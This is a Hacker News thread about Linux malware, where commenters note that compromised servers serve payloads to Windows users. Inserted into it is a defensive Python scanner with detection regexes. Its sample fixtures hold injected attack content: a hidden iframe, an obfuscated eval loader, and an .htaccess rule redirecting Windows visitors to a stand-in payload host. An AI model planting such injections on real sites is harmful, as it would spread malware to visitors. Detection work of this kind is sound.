

Malware on Linux – When Penguins Attack - fgeorgy
https://nakedsecurity.sophos.com/2015/07/28/malware-on-linux-when-penguins-attack/

======
em3rgent0rdr
curiously, I'm on fsf-endorsed parabola linux, and of course the soundcloud
won't play due to iceweasel's default privacy protections.

Could someone who listened to this podcast enlighten me with brief summary?
Mainly, if I only install the open-source vetted software from my package
distributor, and don't do silly things like insert untrusted usb devices or
run binaries not from my distro's repository, or execute random scripts from
the internet, or disable my sudo password, or not keep up-to-date with
security patches, and assuming I'm not subject to 0-days, then how does the
malware get in?

The only malware I'm aware that I've ever had on linux is from ubuntu
installing the amazon search thingie, or from proprietary programs I thought I
might try which ended up running stuff I didn't want in the background.

~~~
choudanu4
The security researcher who was interviewed was not able to garner how the
malware gets in as that would require breaking into the infected systems,
which he was not prepared to do (as it would be illegal).

The entire podcast was simply statistics, with the occasional repeated
reminder to update packages.

The key takeaway was that linux servers when infected are often used as attack
vectors for distributing a further set of malware on windows computers (which
are the end target). The estimate from the podcast said of the compromised
URLs that the researcher investigated, 80% ran some derivative of linux (i.e.
apache server) and 20% were windows (an insignificant [~.1%] were other OSs).
Another point, the researcher claimed was that 20% of the "compromised" linux
URLs were actually infrastructure set up by exploiters themselves, rather than
servers taken over forcibly. A final point, the researcher noted that many (no
definite statistic here) of the compromised linux servers were running old
versions of software (be it apache or whatever).

TL;DR: Linux servers (when compromised) are often used as attack vectors to
distribute malware to Windows computers (which are the end targets).
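The takeaway above (a compromised Linux web server that quietly redirects or serves payloads to Windows visitors) is something an administrator can triage for locally. The script below is an added example, not code from the podcast or the article; the signatures it looks for (hidden zero-size iframes, obfuscated script loaders, `.htaccess` rewrites keyed on a Windows user agent that send the visitor off-site) are generic assumptions of this example, and the sample web root it scans is constructed inline using the reserved, non-resolving hostname `example.invalid`.

```python
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Assumed heuristics (not from the podcast): generic injection patterns found
# on web servers that have been turned into distribution points for Windows
# malware. Each is a regex applied to file contents.
SIGNATURES = {
    "hidden-iframe": re.compile(
        r'<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0\b', re.I),
    "obfuscated-js": re.compile(
        r'\beval\s*\(\s*(?:unescape|atob|String\.fromCharCode)\s*\(', re.I),
    "ua-keyed-rewrite": re.compile(
        r'RewriteCond\s+%\{HTTP_USER_AGENT\}\s+\S*windows', re.I),
    "external-redirect": re.compile(
        r'RewriteRule\s+\S+\s+https?://', re.I),
}

# Only content that a browser executes or Apache evaluates is worth scanning.
SCAN_SUFFIXES = {".html", ".htm", ".php", ".js"}


def scan_text(text: str) -> list[str]:
    """Return the names of every signature that matches this content."""
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_webroot(root) -> dict[str, list[str]]:
    """Walk a web root and map each suspicious file (relative path) to its hits.

    Files are read with errors="replace" so a binary or mis-encoded file
    cannot abort the scan."""
    root = Path(root)
    findings: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        if path.name != ".htaccess" and path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        hits = scan_text(path.read_text(errors="replace"))
        if hits:
            findings[str(path.relative_to(root))] = hits
    return findings


def build_sample_webroot() -> Path:
    """Constructed sample site: one clean page, one page with an injected
    iframe and script loader, and an .htaccess that redirects Windows
    browsers to an off-site payload. example.invalid never resolves."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.html").write_text(
        "<html><body><h1>Hello</h1></body></html>\n")
    (root / "blog").mkdir()
    (root / "blog" / "post.html").write_text(
        '<html><body>text'
        '<iframe src="http://example.invalid/x.php" width="0" height="0">'
        '</iframe><script>eval(unescape("%64%6f%63"))</script>'
        '</body></html>\n')
    (root / ".htaccess").write_text(
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]\n"
        "RewriteRule ^(.*)$ http://example.invalid/load.php [R=302,L]\n")
    # Not a scanned suffix, so this file is skipped even though it matches.
    (root / "style.css").write_text("body { eval(unescape( }\n")
    return root


if __name__ == "__main__":
    for rel, hits in scan_webroot(build_sample_webroot()).items():
        print(f"{rel}: {', '.join(hits)}")
```

Run it against a real document root (`scan_webroot("/var/www/html")`) and treat every hit as a starting point for a manual look, not a verdict: the user-agent rewrite is the most telling, because a legitimate site rarely has a reason to route Windows visitors to a different host.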

~~~
em3rgent0rdr
Sounds like the title should have been, "when malicious internet servers
attack!"

>> "The security researcher who was interviewed was not able to garner how the
malware gets in as that would require breaking into the infected systems,
which he was not prepared to do (as it would be illegal)."

Not much of a security researcher if we aren't breaking into systems. My
understanding of the term "security research" is that you hack into systems
under safely quarantined experimental setups to provide specific knowledge of
how, in order to improve future systems.

------
jmnicolas
I think it's even worse on Linux, because on Windows you have an anti-virus
that might detect that you have malware. On Linux you're blind.

